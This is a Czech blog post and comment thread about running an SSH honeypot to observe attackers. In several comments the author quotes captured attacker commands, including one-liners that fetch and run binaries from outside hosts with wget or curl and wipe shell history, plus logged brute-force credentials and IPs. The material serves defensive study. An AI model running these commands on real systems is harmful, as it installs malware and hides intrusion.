abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
dnes 19:55 | Zajímavý článek

Byly zveřejněny (pdf) podrobnosti o kritické bezpečnostní chybě CVE-2017-12542 v HPE iLO 4 (Integrated Lights-Out), tj. v proprietárním řešení společnosti Hewlett Packard Enterprise pro vzdálenou správu jejich serverů. Bezpečnostní chyba zneužitelná k obejití autentizace a k vzdálenému spuštění libovolného kódu byla opravena již v květnu loňského roku ve verzi 2.53.

Ladislav Hagara | Komentářů: 1
dnes 17:55 | Zajímavý projekt

CSIRT.CZ informuje o CTF (Capture the Flag) platformě ZSIS CTF s úlohami pro procvičování praktických dovedností z oblasti kybernetické bezpečnosti a upozorňuje na soutěž Google Capture the Flag 2018, kde je možné vyhrát zajímavé ceny.

Ladislav Hagara | Komentářů: 0
dnes 17:00 | Komunita

Byly zveřejněny prezentace a videozáznamy přednášek z prvního československého setkání síťových operátorů CSNOG konaného 11. a 12. června v Brně a semináře IPv6 2018 uskutečněného 6. června v Praze.

Ladislav Hagara | Komentářů: 0
dnes 16:11 | Komunita

Svobodný unixový operační systém FreeBSD slaví 25 let. Přesně před pětadvaceti lety, tj. 19. června 1993, byl vybrán název FreeBSD.

Ladislav Hagara | Komentářů: 0
dnes 15:11 | Komunita

Oficiální YouTube kanál Blenderu je již několik dní blokován. Nadace Blender Foundation informuje, že od společnosti Google dostala šestistránkový návrh nové smlouvy (pdf). Zdá se, že podmínkou další spolupráce je zapnutí reklam na kanálu, tj. zpeněžení obsahu.

Ladislav Hagara | Komentářů: 21
dnes 01:55 | Nová verze

Byla vydána verze 1.13 multiplatformního open source textového editoru Brackets (Wikipedie, GitHub). Přehled novinek v oficiálním oznámení a v poznámkách k vydání. Brackets je nově dostupný také jako balíček ve formátu Flatpak z oficiálního repozitáře Flathub.

Ladislav Hagara | Komentářů: 3
včera 18:44 | Komunita

Oficiální YouTube kanál Blenderu je již několik dní blokován. Důvody jsou zatím nejasné. Pravděpodobně chyba YouTube. Dění lze sledovat na Twitteru Tona Roosendaala.

Ladislav Hagara | Komentářů: 18
včera 17:55 | Zajímavý software

Na GitHubu byly pod open source licencí LLVM zveřejněny zdrojové kódy překladače programovacího jazyka C++ Zapcc vycházejícího z Clangu/LLVM. Překlad pomocí Zapccu je díky lepšímu kešování obvykle několikrát rychlejší než překlad pomocí Clangu. V březnu loňského roku byl vydán Zapcc ve verzi 1.0.

Ladislav Hagara | Komentářů: 0
včera 17:22 | Pozvánky

Červnový pražský sraz spolku OpenAlt se koná již tento čtvrtek – 21. 6. 2018 od 18:00 v Kavárně Ideál (Sázavská 30, Praha), kde máme rezervovaný salonek. Tentokrát na téma: F-Droid, aneb svobodný software do vašeho mobilu. Kromě toho budou k vidění i vývojové desky HiFive1 se svobodným/otevřeným čipem RISC-V.

xkucf03 | Komentářů: 1
15.6. 22:44 | Zajímavý článek

Na blogu projektu NeoPG (GitHub), kryptografického softwaru vycházejícího z GnuPG, byly zveřejněny 4 příspěvky detailně popisující aktuální bezpečnostní problémy v GnuPG a souvisejících softwarových produktech. V prvním příspěvku je ukázáno, že je možné vytvořit zprávu, o které budou Earlybird, Evolution, Mutt nebo Outlook tvrdit, že jí dešifrovali a přitom ale zpráva vůbec zašifrována nebyla. V druhém příspěvku je popsána

… více »
Ladislav Hagara | Komentářů: 8
Jak čtete delší texty z webových stránek?
 (78%)
 (22%)
 (4%)
 (7%)
 (2%)
 (11%)
Celkem 213 hlasů
 Komentářů: 36, poslední včera 21:16
    Rozcestník

    Honeypot

    8.3. 04:22 | Přečteno: 1764× | Všechno možný | poslední úprava: 8.3. 04:22

    Zdravim ve spolek a uvadim dalsi zapisek z mojeho IT kutilstvi.
    Jiz nejakou dobu se zabyvam ze zvedavosti sledovanim utocniku na SSH lakanych na tzv. hrnec medu kdy se prihlasi na server a zadavaji ruzne prikazy. Tyto jsou pak zaznamenany zrovnatak jako uzivatelska jmena, hesla a lze si pocist co se hackerovi/robotovi honi hlavou. Toto je docela zajimava vec. V ceskem podani nabizi honeypot sdruzeni NIC na strance zde. Cesta neni vsak zdaleka tak snadna jak by se dalo predpokladat prostym presmerovanim portu 22 treba pomoci iptables na nejakou IP za kterou honeypot bezi. Nutno si nainstalit haas proxy coz se stalo tercem kritiky a obav o bezpecnost PC/serveru kde tuto proxy uzivatel nasadi. No rozhod jsem se verit NIC ze neudelali pri vyvoji proxy nejakou zasadni botu ci neprehledli bezpecnostni diry.

    Je to takove pocteni si pekne vecer pro pouceni. Premyslim zda se prihlasuje zivy clovek nebo proste nejaky naprogramovany robot. Zatim vsechny utoky pochazi z Ciny, Taiwanu, USA, Koreje, Japonska, Francie. Toto si lze prohlednout i v mape sveta ktera se nachazi pod logy. Toz co myslite... ma medovy hrnec smysl? Kdyz to hacker nedotahne do konce protoze zjisti dost brzo ze naletel na med? Laka me i myslenka protunelit 22 port az dom na specielne nachystany PC s nejakym distrem, root s praznym heslem a sledovat co z toho bude. Jen nevim jak bych odchytaval prikazy kdyz by je utocnik beztak mazal z historie. No asi blby napad a necham na NIC at se s temi utoky potrapi kdyz se holedbaji kterak toto vzali na vlastni bedra. Mj vystupy by mely poslouzit k analyze a studiu chovani utocniku, nasledne prevenci. Data bude vyuzivat i CSIRT. Dalsi etapou pro me bude po nejakym case spustit proxy na vysokom portu (treba nad 50 000) a cekat zda i tam bude nejaky pokus o prihlaseni. Sam vidim posileni bezpecnosti v nastaveni nestandardniho vysokeho portu, zakazat prihlasovani jako root, pouzivat prihlaseni pomoci klicu a eventuelne povolit prihlaseni pouze z konkretnich IP nebo alespon rozsahu (toto by zasadne ulevilo SSH serveru).
    Honeypot od NIC zatim bezi pouze pres IPv4 kde dochazi k nejvetsimu poctu utoku- Tak a najde se tu nekdo experimentujici s honeypotem?

    Dluzno poznamenat k obezretnosti pri prihlaseni na server muzeme pozdeji zapomenout ze se hlasime na honeypot cimz budou nase prihlasovaci udaje na skutecny server poskytnuty NIC a objevi se v logach ktere jsou volne ke stazeni.        

    Hodnocení: 80 %

            špatnédobré        

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    8.3. 09:09 Banán
    Rozbalit Rozbalit vše Re: Honeypot
    To nám to ani neukážeš tie logy?
    otasomil avatar 8.3. 14:53 otasomil | skóre: 36 | blog: puppylinux
    Rozbalit Rozbalit vše Re: Honeypot
    Neco z logu zde. Vetsinou se jedna o tytez sekvence asi 30 prikazu. Obcas neco jednoduchyho jaku uname, free, df -h, rm -rf / ..... ale to jen opravdu malo
    13:26:38 	$ /gweerwe323f 	
    13:26:38 	$ 	
    13:26:38 	$ /bin/busybox cp; /gweerwe323f 	
    13:26:38 	$ 	
    13:26:38 	$ mount ;/gweerwe323f 	
    13:26:38 	$ 	
    13:26:38 	$ echo -e '\x47\x72\x6f\x70/' > //.nippon; cat //.nippon; rm -f //.nippon 	
    13:26:38 	$ 	
    13:26:38 	$ echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon; cat /tmp/.nippon; rm -f /tmp/.nippon 	
    13:26:38 	$ 	
    13:26:38 	$ echo -e '\x47\x72\x6f\x70/var/tmp' > /var/tmp/.nippon; cat /var/tmp/.nippon; rm -f /var/tmp/.nippon 	
    13:26:38 	$ 	
    13:26:38 	$ echo -e '\x47\x72\x6f\x70/' > //.nippon; cat //.nippon; rm -f //.nippon 	
    13:26:38 	$ 	
    13:26:38 	$ echo -e '\x47\x72\x6f\x70/lib/init/rw' > /lib/init/rw/.nippon; cat /lib/init/rw/.nippon; rm -f /lib/init/rw/.nippon 	
    13:26:38 	$ 	
    13:26:38 	$ echo -e '\x47\x72\x6f\x70/proc' > /proc/.nippon; cat /proc/.nippon; rm -f /proc/.nippon 	
    13:26:38 	$ 	
    13:26:38 	$ echo -e '\x47\x72\x6f\x70/sys' > /sys/.nippon; cat /sys/.nippon; rm -f /sys/.nippon 	
    13:26:38 	$ 	
    13:26:38 	$ echo -e '\x47\x72\x6f\x70/dev' > /dev/.nippon; cat /dev/.nippon; rm -f /dev/.nippon 	
    13:26:38 	$ 	
    13:26:38 	$ echo -e '\x47\x72\x6f\x70/dev/shm' > /dev/shm/.nippon; cat /dev/shm/.nippon; rm -f /dev/shm/.nippon 	
    13:26:38 	$ 	
    13:26:38 	$ echo -e '\x47\x72\x6f\x70/dev/pts' > /dev/pts/.nippon; cat /dev/pts/.nippon; rm -f /dev/pts/.nippon 	
    13:26:38 	$ 	
    13:26:38 	$ /gweerwe323f 	
    13:26:38 	$ 	
    13:26:38 	$ cat /bin/echo ;/gweerwe323f 	
    13:26:38 	$
    
    A takto vypada datum, cas, geolokace IP, IP, pocet sezeni, username, password:
    2018-03-08 14:05:42 	FRA - 51.254.121.56 	1 	admin 	admin@123 		
    2018-03-08 14:05:40 	FRA - 51.254.121.56 	1 	admin 	admin@123 		
    2018-03-08 14:05:39 	FRA - 51.254.121.56 	1 	admin 	admin@123 		
    2018-03-08 14:05:38 	FRA - 51.254.121.56 	1 	admin 	admin@123 		
    2018-03-08 14:05:38 	FRA - 51.254.121.56 	1 	admin 	admin@123 		
    2018-03-08 13:26:37 	185.234.218.242 	30 	admin 	motorola 		
    2018-03-08 12:59:30 	POL - 188.125.43.186 	1 	ethos 	live 		
    2018-03-08 12:59:29 	POL - 188.125.43.186 	1 	root 	live 		
    2018-03-08 11:08:51 	185.234.218.242 	32 	root 	1234 		
    2018-03-08 10:19:06 	USA - 192.200.218.166 	1 	root 	zxc123$ 		
    2018-03-08 10:19:05 	USA - 192.200.218.166 	1 	root 	zxc123$ 		
    2018-03-08 01:53:05 	185.234.218.242 	30 	admin 	admin1 		
    2018-03-08 00:59:23 	185.234.218.242 	30 	user 	user 		
    2018-03-07 23:28:07 	185.234.218.242 	0 	usuario 	usuario 		
    2018-03-07 20:33:47 	185.234.218.242 	32 	root 	12345 		
    2018-03-07 19:50:26 	185.234.218.242 	32 	root 	ubnt 		
    2018-03-07 19:23:26 	USA - 192.200.218.166 	1 	root 	12345 		
    2018-03-07 19:23:24 	USA - 192.200.218.166 	1 	root 	12345 		
    2018-03-07 19:20:49 	185.234.218.242 	30 	admin 	default 		
    2018-03-07 19:00:22 	185.234.218.242 	32 	root 	password 		
    2018-03-07 16:45:31 	FRA - 51.254.47.198 	1 	postgres 	postgres 		
    2018-03-07 16:45:29 	FRA - 51.254.47.198 	1 	postgres 	postgres 		
    2018-03-07 16:45:28 	FRA - 51.254.47.198 	1 	postgres 	postgres 		
    2018-03-07 16:45:27 	FRA - 51.254.47.198 	1 	postgres 	postgres 		
    2018-03-07 16:45:26 	FRA - 51.254.47.198 	1 	postgres 	postgres 		
    2018-03-07 15:41:13 	185.234.218.242 	32 	root 	xmhdipc 		
    2018-03-07 13:53:48 	185.234.218.242 	30 	admin 	password 		
    2018-03-07 13:42:02 	USA - 192.200.218.166 	1 	root 	0p9o8t 		
    2018-03-07 13:42:01 	USA - 192.200.218.166 	1 	root 	0p9o8t 		
    2018-03-07 10:03:00 	185.234.218.242 	0 	service 	service 		
    2018-03-07 09:39:09 	185.234.218.242 	30 	admin 	pfsense 		
    2018-03-07 09:15:53 	USA - 173.14.84.113 	2 	pi 	raspberry 		
    2018-03-07 09:15:52 	USA - 173.14.84.113 	2 	pi 	raspberryraspberry993311 		
    2018-03-07 09:15:50 	USA - 173.14.84.113 	1 	pi 	raspberry 		
    2018-03-07 09:15:50 	USA - 173.14.84.113 	1 	pi 	raspberryraspberry993311 		
    2018-03-07 09:11:44 	185.234.218.242 	30 	admin 	default 		
    2018-03-07 08:50:22 	185.234.218.242 	32 	root 	123456 		
    2018-03-07 08:04:05 	185.234.218.242 	32 	root 	uClinux 		
    2018-03-07 07:40:28 	185.234.218.242 	32 	root 	111111 		
    2018-03-06 22:19:23 	KOR - 119.192.239.192 	1 	ethos 	live 		
    2018-03-06 22:19:19 	KOR - 119.192.239.192 	1 	root 	live 		
    2018-03-06 19:58:08 	JPN - 118.241.240.233 	2 	pi 	raspberryraspberry993311 		
    2018-03-06 19:58:07 	JPN - 118.241.240.233 	2 	pi 	raspberry 		
    2018-03-06 19:58:03 	JPN - 118.241.240.233 	1 	pi 	raspberryraspberry993311 		
    2018-03-06 19:58:02 	JPN - 118.241.240.233 	1 	pi 	raspberry 		
    2018-03-04 21:30:50 	CHN - 222.186.172.48 	1 	root 	root 		
    2018-03-04 21:30:37 	CHN - 222.186.172.48 	1 	root 	root 		
    2018-03-04 21:30:26 	CHN - 222.186.172.48 	1 	root 	root 		
    2018-03-04 21:30:13 	CHN - 222.186.172.48 	1 	root 	root 		
    2018-03-04 21:30:01 	CHN - 222.186.172.48 	1 	root 	root 		
    
    K čemu hudba, která nevede k extázi... Stop MDMA !!! Už je to víc jak 50 let: http://buxlrerulbak7g3e.onion/
    Rezza avatar 8.3. 16:10 Rezza | skóre: 25 | blog: rezza | Brno
    Rozbalit Rozbalit vše Re: Honeypot
    Jop, presne tenhle tam mam taky.
    Bystroushaak avatar 8.3. 19:14 Bystroushaak | skóre: 33 | blog: Bystroushaakův blog | Praha
    Rozbalit Rozbalit vše Re: Honeypot
    Co má být ten .nippon? To je honeypot test na permissions?
    „At the core of his own mind a white star seemed to burn, around which lust for knowledge spun in ever tighter orbits.“
    otasomil avatar 8.3. 19:35 otasomil | skóre: 36 | blog: puppylinux
    Rozbalit Rozbalit vše Re: Honeypot
    Zdravim To vubec netusim co je .nippon. V nekterych prikazech je i URL volana pomoci wget ale nejde nic stahnout (Eror404). Aktualni cerstvy utok zde:
    $ rm -f /tmp/run;if [ `getconf LONG_BIT` -eq 64 ];then u="http://www.bizqsoft.com/tp2/r6.log";else u="http://www.bizqsoft.com/tp2/r.log";fi;(wget -O /tmp/run $u || curl -o /tmp/run $u || python -c "import urllib;urllib.urlretrieve('$u','/tmp/run')");echo > ~/.bash_history;chmod 0777 /tmp/run && /tmp/run;rm -rf /tmp/run
    
    K čemu hudba, která nevede k extázi... Stop MDMA !!! Už je to víc jak 50 let: http://buxlrerulbak7g3e.onion/
    8.3. 22:26 elenril
    Rozbalit Rozbalit vše Re: Honeypot
    Nippon je zcela zřejmě banzai
    9.3. 09:17 M.
    Rozbalit Rozbalit vše Re: Honeypot
    Nippon je zkomoleně Japonsko. Ale je mi to divný. Japonec a nemá náramek? :-)
    Bystroushaak avatar 9.3. 10:44 Bystroushaak | skóre: 33 | blog: Bystroushaakův blog | Praha
    Rozbalit Rozbalit vše Re: Honeypot
    Neptal jsem se co znamená nippon, ale proč dělá, co dělá.
    „At the core of his own mind a white star seemed to burn, around which lust for knowledge spun in ever tighter orbits.“
    9.3. 11:53 marvn
    Rozbalit Rozbalit vše Re: Honeypot
    je to jen nazev souboru. mohlo by se to jmenovat i jinak, ale asi se autorovi to slovo libi
    Jendа avatar 9.3. 11:59 Jendа | skóre: 74 | blog: Výlevníček | JO70FB
    Rozbalit Rozbalit vše Re: Honeypot
    LOL, to je tady dneska nějaký sraz botů nebo trollů?
    Klimakemp ve zkratce: Účastníci jeli vlakem na naftu a autobusem na naftu protestovat proti těžbě fosilních paliv.
    9.3. 12:11 marvn
    Rozbalit Rozbalit vše Re: Honeypot
    no dobre no, http://ddecode.com/hexdecoder/?results=9aa8836e04c89cd1b97e6a441d99578e
    Bystroushaak avatar 9.3. 14:43 Bystroushaak | skóre: 33 | blog: Bystroushaakův blog | Praha
    Rozbalit Rozbalit vše Re: Honeypot
    Co má být pointou?
    „At the core of his own mind a white star seemed to burn, around which lust for knowledge spun in ever tighter orbits.“
    10.3. 00:44 pc2005 | skóre: 36 | blog: GardenOfEdenConfiguration | liberec
    Rozbalit Rozbalit vše Re: Honeypot
    Mě by spíš zajímalo co dělá ten
    /gweerwe323f
    .

    Jinak do toho nipponu se zapisuje "Grop" jako ascii, google napoví. Já bych teda zkoušel něco jako .bash_history sice poutá víc pozornosti (teda pokud uživatel vypisuje i tečkový hidden soubory), ale dá se zase ospravedlnit bugem s $HOME.

    Vypadá to že to je prostě jen test oprávnění. Ony embedded systémy často můžou bejt readonly.
    8.3. 16:28 smíťa | skóre: 6 | blog: Zápisky z Lyntu
    Rozbalit Rozbalit vše Re: Honeypot
    Několik let provozuji několik honeypotů - ssh a http emulující WordPress. Data, která z toho získávám jsou velmi zajímavá a užitečná. Sám si dělám interní IP blacklist pro své reálné servery, pokud se objeví nová zranitelnost, tak se o ní díky honeypotu dozvím vcelku rychle a mohu připravit pravidla, která problém eliminují.

    Co se týká SSH, tak se setkávám s tím, že pravděpodobně existují skupiny "hackerů", které mají od zadavatele předpřipravený seznam příkazů co mají napsat a jedou podle toho. Že to nejsou roboti lze poznat podle různých překlepů, co dělají, když to píšou. Nicméně scénář je vždy hodně podobný - pár příkazů na zjištění informací o serveru (cpuinfo atd.), vytvoření vlastního uživatele (v useradd se ptám třeba na oblíbený film, což jich dost vyplní :-) ) a stažení nějakého ddos skritpu a jeho spuštění. Toto se mi děje často jako přes kopírák.

    9.3. 07:54 Aleš Kapica | skóre: 47 | blog: kenyho_stesky | Ostrava
    Rozbalit Rozbalit vše Re: Honeypot
    Zajímavé. Nechceš o tom napsat nějaký blogpost pro pobavení?
    9.3. 15:47 David Indra | skóre: 14 | Prostějov
    Rozbalit Rozbalit vše Re: Honeypot
    Nějaké info o té emulaci WordPressu by se taky šiklo.
    9.3. 16:40 Kate | skóre: 8
    Rozbalit Rozbalit vše Re: Honeypot
    Mě by zajímaly ty oblíbené filmy, inspirace na dlouhé zimní večery není nikdy dost :D (každopádně, ten honeypot samotný rozhodně také)
    9.3. 22:41 smíťa | skóre: 6 | blog: Zápisky z Lyntu
    Rozbalit Rozbalit vše Re: Honeypot
    Na SSH používám osvědčený Cowrie (stejně jako NIC). Našel jsem zrovna jedno nahrané starší video "šikovného hackera" na jeden už zrušený honeypot (měl jsem hloupě jméno "pot" v hostname, což mohlo někoho chytřejšího hned odradit):

    Tipy na filmy jsou většinou docela nudné - poměrně často Iron Man a aktuální marvelovky. Jeden útočník měl oblíbeného Posledního samuraje.

    Také koukám, co za malware mi nahrávají a i dnes je jednoznačně nejčastější skript Simple UDP flood z roku 2004 (mluvil jsem o tom třeba na WordCampu 2016).

    Pro WP používám upravený WordPot, tam jsou pro mě zajímavé samozřejmě HTTP dotazy na nové endpointy, to že někdo zkouší brute force na admin, je nuda. Zajímavé jsou také různé externí js (nejčastěji těžařské), které se snaží přes různé zranitelnosti nahrát. Nicméně většinou když jsem skripty zkoumal, tak už dávno na zdrojovém webu neexistovaly - nákaza přicházela s dost velkým zpožděním.

    Každému, kdo se o bezpečnost zajímá, rozhodně doporučuji si nějaký honeypot rozjet, VPS za 25 korun u Forpsi na to bez problému stačí :-)
    8.3. 19:13 pc2005 | skóre: 36 | blog: GardenOfEdenConfiguration | liberec
    Rozbalit Rozbalit vše Re: Honeypot
    Chtěl jsem si kdysi udělat honeypot taky, ale nakonec jsem nepřišel na to, jak zjednodušit ssh, aby se mohli ti boti vůbec přihlásit bez hesla (se slovníkovým).
    xkucf03 avatar 8.3. 21:20 xkucf03 | skóre: 46 | blog: xkucf03
    Rozbalit Rozbalit vše Re: Honeypot a GDPR

    <trolling>

    Jiz nejakou dobu se zabyvam ze zvedavosti sledovanim utocniku na SSH lakanych na tzv. hrnec medu kdy se prihlasi na server a zadavaji ruzne prikazy. Tyto jsou pak zaznamenany zrovnatak jako uzivatelska jmena, hesla a lze si pocist co se hackerovi/robotovi honi hlavou. Toto je docela zajimava vec.

    A jestlipak od těch nebožáků máš souhlas se zpracováním osobních údajů v souladu s GDPR? :-D

    </trolling>

    Mám rád, když se lidé přou, znamená to, že vědí, co dělají, a že mají směr. Frantovo.cz, SQL-Výuka.cz, Nekuřák.net
    9.3. 09:08 marbu | skóre: 29 | blog: hromada | Brno
    Rozbalit Rozbalit vše Re: Honeypot a GDPR
    Heh, možná bude statčit nahradit "Welcome on system xyz!" v /etc/motd za nějaký legal banner podobně jako to už nějakou dobu musí dělat v usa.
    I think warning here is a bug. The biggest cloud service provider. There is no point in being so cool in a cold world.
    10.3. 00:44 pc2005 | skóre: 36 | blog: GardenOfEdenConfiguration | liberec
    Rozbalit Rozbalit vše Re: Honeypot a GDPR
    Pokud pošlou request s plným jménem a IP adresou, tak věřím že to autor zařídí :-D.
    9.3. 20:11 Ferdinand Vaněk
    Rozbalit Rozbalit vše Re: Honeypot
    Jiz nejakou dobu se zabyvam ze zvedavosti sledovanim utocniku na SSH lakanych na tzv. hrnec medu
    Toto je hyenismus nejhrubšího zrna. Ti lidé nejsou žádní útočníci, ale běženci!!! Ve své zemi nemají dostatek serverů, na kterých by se mohli realizovat, a tak hledají útočiště u nás. Proč automaticky předpokládáte, že vám chtějí škodit?? Místo, abyste se choval jako obyčejný xenofob a nácek, byste jim měl pomoci, podělit se o svůj nadbytek a poskytnout jim prostor na svém serveru. Oni vám vůbec škodit nemusí - a můžou vám naopak třeba obohatit operační systém nějakým skriptem nebo binárkou, ze kterých se něco naučíte, nebo které můžete sám používat. Nebo díky nim získáte kontakty na jiné servery, na které se jde připojit... Třeba taky jednou budete potřebovat pomoc, tak na to myslete, než se příště budete chovat zase takhle sobecky.
    9.3. 20:17 Tomáš
    Rozbalit Rozbalit vše Re: Honeypot
    Kdysi se ty prikazy logovaly primo na tiskarnu. Dokud utocnik nema fyzicky pristup, tak nesmaze.

    Dodnes by snad v linuxu mohl byt vystup na seriovy port, ale zase ho nema kazdy pocitac. Ale mozna by slo udelat neco s Raspbery pi, jenom to musis udelat dost hloupe na to, aby ti nehackli i to Rpi.
    otasomil avatar 10.3. 15:37 otasomil | skóre: 36 | blog: puppylinux
    Rozbalit Rozbalit vše Re: Honeypot
    Pokus o stazeni a spusteni binarky:
    $ #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://199.231.68.230/ys808e curl -O http://199.231.68.230/ys808e chmod +x ys808e ./ys808e 
    
    Virustotal rika toto
    SHA256 soucet souboru ys808e ve vyhledavani Google
    K čemu hudba, která nevede k extázi... Stop MDMA !!! Už je to víc jak 50 let: http://buxlrerulbak7g3e.onion/
    otasomil avatar 18.3. 07:11 otasomil | skóre: 36 | blog: puppylinux
    Rozbalit Rozbalit vše Re: Honeypot
    Zdravim
    Vyzkum pouzivanych portu:
    port 50000 nezaznamenano jedine prihlaseni
    port 19458 nezaznamenano jedine prihlaseni
    port 2222 ktery je u haas proxy nastaven jako vychozi a asi je uz robotum proflaknuty takze nekolik prihlaseni za den tu bylo.
    No a port 22 tam to holt frci v desitkach prihlaseni denne.
    K čemu hudba, která nevede k extázi... Stop MDMA !!! Už je to víc jak 50 let: http://buxlrerulbak7g3e.onion/

    Založit nové vláknoNahoru

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.